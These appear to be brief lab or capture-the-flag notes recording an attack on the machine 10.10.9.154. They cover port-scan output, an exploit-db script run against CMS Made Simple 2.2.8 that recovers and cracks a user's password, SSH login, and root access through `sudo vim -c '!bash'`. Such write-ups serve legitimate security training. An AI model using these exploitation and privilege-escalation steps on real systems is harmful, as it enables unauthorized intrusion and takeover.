10.10.9.154
ttl63 > linux
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.18.92.168
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
 ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
Service Info: OS: Unix
Cookies[CMSSESSIDd6a5f2400115]
whatweb 10.10.9.154/simple/

[+]EXPLOIT[+]
CMS-Made-Simple[2.2.8]
https://www.exploit-db.com/exploits/46635
python 46635.py -u http://10.10.9.154/simple/ -w /usr/share/rockyou.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Cracking Password: secret

[+]Privilage escaltion[+]
ssh mitch@ip -p2222
user.txt
sudo -l
/usr/bin/vim
sudo vim -c '!bash'
root.txt






